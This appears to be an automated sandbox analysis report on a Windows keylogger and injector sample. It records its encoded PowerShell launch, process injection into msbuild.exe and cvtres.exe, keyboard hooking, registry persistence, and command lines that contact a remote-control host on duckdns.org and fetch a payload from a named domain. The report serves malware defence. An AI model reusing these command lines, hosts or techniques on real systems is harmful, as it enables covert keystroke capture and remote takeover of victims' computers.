MALICIOUS DYNAMIC ANALYSIS REPORT # X-Ray Vision for Malware / 24. Classifications: Injector Keylogger.

(1)

MALICIOUS

Classifications: Injector Keylogger

Threat Names: - Verdict Reason: -

Sample Type Windows Exe (x86-32)

File Name 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe

ID #1561912

MD5 e41f3d5033575c4f4cf2acd0d1d0624d

SHA1 18ff7a2ec479855e65ba2a83deeb917abed16ff9

SHA256 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5

File Size 17.50 KB

Report Created 2022-02-09 21:31 (UTC+1)

Target Environment win10_64_th2_en_mso2016 | exe

(2)

OVERVIEW

VMRay Threat Identifiers (15 rules, 26 matches)

Score Category Operation Count Classification

4/5 Execution Executes encoded PowerShell command 1 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe executes base64-encoded Powershell command.

•

4/5 Injection Writes into the memory of another process 2 Injector

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe modifies memory of (process #6) msbuild.exe.

(Process #6) msbuild.exe modifies memory of (process #8) cvtres.exe.

•

4/5 Injection Modifies control flow of another process 2 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe alters context of (process #6) msbuild.exe.

(Process #6) msbuild.exe alters context of (process #8) cvtres.exe.

•

3/5 Input Capture Monitors keyboard input 1 Keylogger

(Process #6) msbuild.exe installs system wide "WH_KEYBOARD_LL" hook(s) to monitor keystrokes.

•

2/5 Masquerade Creates a new process from a system binary 1 -

(Process #6) msbuild.exe creates a new explorer.exe process.

•

2/5 Network Connection File contains known DDNS domain 1 -

Embedded URL vncnew1984.duckdns.org leads to a host of dynamic DNS provider duckdns.org.

•

1/5 Hide Tracks Creates process with hidden window 5 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe starts (process #2) powershell.exe with a hidden window.

(Process #2) powershell.exe starts (process #4) cmd.exe with a hidden window.

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe starts (process #6) msbuild.exe with a hidden window.

(Process #6) msbuild.exe starts (process #7) explorer.exe with a hidden window.

(Process #6) msbuild.exe starts (process #8) cvtres.exe with a hidden window.

•

1/5 Privilege Escalation Enables process privilege 2 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe enables process privilege "SeDebugPrivilege".

(Process #6) msbuild.exe enables process privilege "SeDebugPrivilege".

•

1/5 Persistence Installs system startup script or application 1 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe adds ""C:\Users\RDhJ0CNFevzX\AppData\Roaming\Demo\Test.exe"" to Windows startup via registry.

•

(3)

Score Category Operation Count Classification

1/5 Obfuscation Creates a page with write and execute permissions 2 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe allocates a page in a foreign process with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code.

(Process #6) msbuild.exe allocates a page in a foreign process with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code.

•

1/5 Mutex Creates mutex 1 -

(Process #8) cvtres.exe creates mutex with name "ecZCILAfG".

•

1/5 Network Connection Performs DNS request 1 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe resolves host name "limanlimanlawyers.com" to IP "23.94.150.194".

•

1/5 Network Connection Connects to remote host 2 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe accepts an incoming TCP connection from host "23.94.150.194:443".

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe opens an outgoing TCP connection to host "23.94.150.194:443".

•

(4)

Mitre ATT&CK Matrix

Initial Access Execution Persistence Privilege Escalation

Defense Evasion

Credential

Access Discovery Lateral

Movement Collection Command

and Control Exfiltration Impact

#T1086 PowerShell

#T1060 Registry Run Keys / Startup

Folder

#T1179

Hooking #T1143 Hidden

Window #T1056 Input Capture

#T1057 Process Discovery

#T1056 Input Capture

#T1179

Hooking #T1112 Modify

Registry #T1179 Hooking

#T1045 Software Packing

#T1140 Deobfuscate/

Decode Files or Information

#T1027 Obfuscated

Files or Information

(5)

Sample Information

Analysis Information

ID #1561912

MD5 e41f3d5033575c4f4cf2acd0d1d0624d

SHA1 18ff7a2ec479855e65ba2a83deeb917abed16ff9

SHA256 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5

SSDeep 384:eBAiyJNFVJU14KU6nX2D+bFQkNubvg+4OXEW46njPHoWWDDDDDDDDDDN:iGFwWp6nnb+/XjDjYDDDDDDDDDDN

ImpHash f34d5f2d4577ed6d9ceec516c1f5a744

File Name 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe

File Size 17.50 KB

Sample Type Windows Exe (x86-32)

Has Macros

Creation Time 2022-02-09 21:31 (UTC+1)

Analysis Duration 00:04:00

Termination Reason Timeout

Number of Monitored Processes 7

Execution Successful False

Reputation Enabled

WHOIS Enabled

Built-in AV Enabled

Built-in AV Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of AV Matches 0

YARA Enabled

YARA Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of YARA Matches 0

(6)

(7)

Screenshots truncated

(8)

NETWORK

General

DNS

HTTP/S

HTTP Requests

Method URL Dest. IP Dest. Port Status Code Response Size Verdict

DNS Requests

Type Hostname Response Code Resolved IPs CNames Verdict

3.56 KB total sent

1048.75 KB total received 1 ports 443

2 contacted IP addresses

1 URLs extracted 0 files downloaded

0 malicious hosts detected

1 DNS requests for 1 domains 1 nameservers contacted

0 total requests returned errors

1 URLs contacted, 1 servers

1 sessions, 3.56 KB sent, 1048.75 KB received

vncnew1984.duckdns.org - - 0 bytes NA

GET https://limanlimanlawyers.com/cv/Jikte.jpg - - 0 bytes NA

A limanlimanlawyers.com NoError 23.94.150.194 NA

(9)

BEHAVIOR

Process Graph

Sample Start #1

4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe

#2 powershell.exe Child Process

#6 msbuild.exe Modify Memory

Modify Control Flow Child Process

#4 cmd.exe

Child Process #5

timeout.exe Child Process

#7 explorer.exe Child Process

#8 cvtres.exe Modify Memory

Modify Control Flow Child Process

(10)

Process #1: 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe

Dropped Files (1)

File Name File Size SHA256 YARA Match

Host Behavior

Type Count

Network Behavior

Type Count

ID 1

File Name c:\users\rdhj0cnfevzx\desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe Command Line "C:\Users\RDhJ0CNFevzX\Desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe"

Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\

Monitor Start Time Start Time: 70955, Reason: Analysis Target Unmonitor End Time End Time: 238185, Reason: Terminated

Monitor duration 167.23s

Return Code 0

PID 240

Parent PID 1676

Bitness 32 Bit

C:\Users\RDhJ0CNFevzX\AppData\Roaming\Demo\Test.exe 17.50 KB 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e 0a5

- 10

Registry 27

Process 105

File 26

System 111

Environment 10

Module 31

User 2

- 3

- 7

HTTPS 1

DNS 1

TCP 1

(11)

Process #2: powershell.exe

Host Behavior

Type Count

ID 2

File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe

Command Line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc YwBtAGQAIAAvAEMAIAB0AGkAbQBlAG8AdQB0ACAAMgAyAA==

Monitor Start Time Start Time: 113706, Reason: Child Process Unmonitor End Time End Time: 182521, Reason: Terminated

Return Code 0

PID 1592

Parent PID 240

Bitness 32 Bit

Module 5

File 31

Environment 14

Registry 2

Process 1

- 13

(12)

Process #4: cmd.exe

Host Behavior

Type Count

ID 4

File Name c:\windows\syswow64\cmd.exe

Command Line "C:\Windows\system32\cmd.exe" /C timeout 22

Return Code 0

PID 5100

Parent PID 1592

Bitness 32 Bit

Module 8

Registry 17

File 18

Environment 19

System 1

Process 1

(13)

Process #5: timeout.exe

Host Behavior

Type Count

ID 5

File Name c:\windows\syswow64\timeout.exe

Command Line timeout 22

Return Code 0

PID 3256

Parent PID 5100

Bitness 32 Bit

Module 2

System 343

File 154

(14)

Process #6: msbuild.exe

Injection Information (6)

Injection Type Source Process Source / Target TID Address / Name Size Success Count

Dropped Files (1)

File Name File Size SHA256 YARA Match

ID 6

File Name c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe Command Line C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Return Code 1073807364

PID 5056

Parent PID 240

Bitness 32 Bit

Modify Memory

#1: c:

\users\rdhj0cnfevzx\desktop

\4c4d844ace41156600bf0c2 ab9df287538002abf30d0ba3f 50836b2e49f5e0a5.exe

0xd14 0x400000(4194304) 0x200 1

Modify Memory

#1: c:

0xd14 0x402000(4202496) 0x59e00 1

Modify Memory

#1: c:

0xd14 0x45c000(4571136) 0x1200 1

Modify Memory

#1: c:

0xd14 0x45e000(4579328) 0x200 1

Modify Memory

#1: c:

0xd14 0x34d008(3461128) 0x4 1

Modify Control Flow

#1: c:

0xd14 / 0x10bc - 1

C:\Users\RDhJ0CNFevzX\AppData\Roaming\tempp4nd0r4 28 bytes 0429aad3007c2d9b26ed655f02e94545ba94bd4caa95e510c3ad163747c a725b

(15)

Type Count

System 11

Module 27

File 5

- 3

- 7

Registry 3

Keyboard 5

(16)

Process #7: explorer.exe

ID 7

File Name c:\windows\explorer.exe

Command Line "C:\Windows\explorer.exe"

Return Code 2

PID 4296

Parent PID 5056

Bitness 64 Bit

(17)

Process #8: cvtres.exe

Injection Information (6)

Injection Type Source Process Source / Target TID Address / Name Size Success Count

Host Behavior

Type Count

ID 8

File Name c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe

Command Line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client vncnew1984.duckdns.org 1984 ecZCILAfG

Return Code 1073807364

PID 4996

Parent PID 5056

Bitness 32 Bit

Modify Memory

#6: c:

\windows\microsoft.net\fra mework\v4.0.30319\msbuil d.exe

0x10bc 0x400000(4194304) 0x200 1

Modify Memory

#6: c:

0x10bc 0x402000(4202496) 0xe600 1

Modify Memory

#6: c:

0x10bc 0x412000(4268032) 0x600 1

Modify Memory

#6: c:

0x10bc 0x414000(4276224) 0x200 1

Modify Memory

#6: c:

0x10bc 0x243008(2371592) 0x4 1

Modify Control Flow

#6: c:

0x10bc / 0xf68 - 1

File 24

Registry 2

Module 18

Mutex 1

(18)

ARTIFACTS

File

SHA256 File Names Category File Size MIME Type Operations Verdict

Filename

File Name Category Operations Verdict

4c4d844ace41156600bf0c2a b9df287538002abf30d0ba3f5 0836b2e49f5e0a5

C:

\Users\RDhJ0CNFevzX\Desktop\4c4 d844ace41156600bf0c2ab9df28753800 2abf30d0ba3f50836b2e49f5e0a5.exe, C:

\Users\RDhJ0CNFevzX\AppData\Ro aming\Demo\Test.exe

Sample File 17.50 KB application/

vnd.microsoft.portable-

executable Access, Write, Create MALICIOUS

0429aad3007c2d9b26ed655f 02e94545ba94bd4caa95e51 0c3ad163747ca725b

C:

\Users\RDhJ0CNFevzX\AppData\Ro

aming\tempp4nd0r4 Dropped File 28 bytes text/plain Access, Write, Create CLEAN

C:

\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.co

nfig Accessed File Read, Access CLEAN

C:

\Users\RDhJ0CNFevzX\Desktop\4c4d844ace41156600bf0c2ab9df28 7538002abf30d0ba3f50836b2e49f5e0a5.exe.config

Accessed File Access CLEAN

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Accessed File Access CLEAN

C:\Windows\system32 Accessed File Access CLEAN

C:\Windows\system32\cmd.exe Accessed File Access CLEAN

C:\Windows\SysWOW64\cmd.exe Accessed File Access CLEAN

C:\Users\RDhJ0CNFevzX\Desktop Accessed File Access CLEAN

C:\Windows\SysWOW64\timeout.exe Accessed File Access CLEAN

C:

\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.co

nfig Accessed File Access CLEAN

System Paging File Accessed File Access CLEAN

C:

\Users\RDhJ0CNFevzX\Desktop\4c4d844ace41156600bf0c2ab9df28

7538002abf30d0ba3f50836b2e49f5e0a5.exe Sample File Access CLEAN

C:\Users\RDhJ0CNFevzX\AppData\Roaming\Demo Accessed File Access, Create CLEAN

C:\Users\RDhJ0CNFevzX\AppData\Roaming Accessed File Access CLEAN

C:\Users\RDhJ0CNFevzX\AppData\Roaming\Demo\Test.exe Sample File Access, Write, Create CLEAN

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Accessed File Access CLEAN

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ Accessed File Access CLEAN

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.Config Accessed File Read, Access CLEAN

C:\Users\RDhJ0CNFevzX\AppData\Roaming\tempp4nd0r4 Dropped File Access, Write, Create CLEAN

(19)

Domain

Domain IP Address Country Protocols Verdict

IP

IP Address Domains Country Protocols Verdict

Mutex

Name Operations Parent Process Name Verdict

Registry

Registry Key Operations Parent Process Name Verdict

vncnew1984.duckdns.org - - HTTP SUSPICIOUS

limanlimanlawyers.com 23.94.150.194 - DNS, HTTPS CLEAN

192.168.0.1 - - UDP, DNS CLEAN

23.94.150.194 limanlimanlawyers.com United States DNS, TCP, HTTPS CLEAN

ecZCILAfG access cvtres.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

NT\CurrentVersion access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

36b2e49f5e0a5.exe ^CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

NT\CurrentVersion\InstallationType read, access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\

AppContext access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

v4.0.30319 access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

v4.0.30319\SchUseStrongCrypto read, access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Po

werShell\ScriptBlockLogging access powershell.exe CLEAN

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Po

werShell\ScriptBlockLogging access powershell.exe CLEAN

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Sy

stem access cmd.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor access cmd.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Command

Processor\DisableUNCCheck read, access cmd.exe CLEAN

Processor\EnableExtensions read, access cmd.exe CLEAN

Processor\DelayedExpansion read, access cmd.exe CLEAN

Processor\DefaultColor read, access cmd.exe CLEAN

Processor\CompletionChar read, access cmd.exe CLEAN

Processor\PathCompletionChar read, access cmd.exe CLEAN

Processor\AutoRun read, access cmd.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Command Processor access cmd.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Command

Processor\DisableUNCCheck read, access cmd.exe CLEAN

Processor\EnableExtensions read, access cmd.exe CLEAN

(20)

Registry Key Operations Parent Process Name Verdict HKEY_CURRENT_USER\Software\Microsoft\Command

Processor\DelayedExpansion read, access cmd.exe CLEAN

Processor\DefaultColor read, access cmd.exe CLEAN

Processor\CompletionChar read, access cmd.exe CLEAN

Processor\PathCompletionChar read, access cmd.exe CLEAN

Processor\AutoRun read, access cmd.exe CLEAN

HKEY_PERFORMANCE_DATA access powershell.exe,

4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508 36b2e49f5e0a5.exe

CLEAN

HKEY_CURRENT_USER access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current

Version\Internet Settings\Connections access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current

Version\Internet Settings\Connections access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows

\CurrentVersion\Internet Settings access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

LegacyWPADSupport read, access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

NT\CurrentVersion\Time Zones\W. Europe Standard Time access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

NT\CurrentVersion\Time Zones\W. Europe Standard Time\TZI read, access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic

DST access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard

Time\MUI_Display read, access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Std read, access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Dlt read, access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

v4.0.30319\HWRPortReuseOnSocketBind read, access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVer

sion\Run access 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVer

sion\Run\Test read, access, write 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f508

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Dbg

JITDebugLaunchSetting read, access msbuild.exe CLEAN

(21)

Process

Process Name Commandline Verdict

4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e 0a5.exe

"C:

\Users\RDhJ0CNFevzX\Desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49

f5e0a5.exe" ^MALICIOUS

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc

YwBtAGQAIAAvAEMAIAB0AGkAbQBlAG8AdQB0ACAAMgAyAA== ^SUSPICIOUS

msbuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe SUSPICIOUS

explorer.exe "C:\Windows\explorer.exe" SUSPICIOUS

cmd.exe "C:\Windows\system32\cmd.exe" /C timeout 22 CLEAN

timeout.exe timeout 22 CLEAN

cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client vncnew1984.duckdns.org

1984 ecZCILAfG ^CLEAN

(22)

YARA / AV

No YARA or AV matches available.

(23)

ENVIRONMENT

Virtual Machine Information

Platform Information

Anti Virus Information

Software Information

System Information

Name win10_64_th2_en_mso2016

Description win10_64_th2_en_mso2016

Architecture x86 64-bit

Operating System Windows 10 Threshold 2

Kernel Version 10.0.10586.0 (0de6dc23-8e19-4bb7-8608-d54b1e6fa379) Network Scheme Name Local Gateway

Network Config Name Local Gateway

Platform Version 4.4.1

Dynamic Engine Version 4.4.1 / 01/14/2022 05:06

Static Engine Version 4.4.1.0 / 2022-01-14 04:00:58

AV Exceptions Version 4.4.1.6 / 2021-12-14 15:06:27 Link Detonation Heuristics Version 4.4.1.7 / 2021-12-15 19:11:26

Smart Memory Dumping Rules

Version 4.4.1.6 / 2021-12-14 15:06:27

Signature Trust Store Version 4.4.1.6 / 2021-12-14 15:06:27 VMRay Threat Identifiers Version 4.4.1.8 / 2022-01-07 14:24:33

YARA Built-in Ruleset Version 4.4.1.10

Built-in AV Version AVCORE v2.2 Linux/x86_64 11.0.1.19 (March 15, 2021)

Built-in AV Database Update Release

Date 2022-02-09 15:45:26+00:00

Built-in AV Database Records 11128487

Adobe Acrobat Reader Version Not installed

Microsoft Office 2016

Microsoft Office Version 16.0.4266.1003

Hangul Office Not installed

Hangul Office Version Not installed

Internet Explorer Version 11.0.10586.0

Chrome Version Not installed

Firefox Version Not installed

Flash Version Not installed

Java Version Not installed

Sample Directory C:\Users\RDhJ0CNFevzX\Desktop

Computer Name XC64ZB

(24)

User Domain XC64ZB

User Name RDhJ0CNFevzX

User Profile C:\Users\RDhJ0CNFevzX

Temp Directory C:\Users\RDHJ0C~1\AppData\Local\Temp

System Root C:\Windows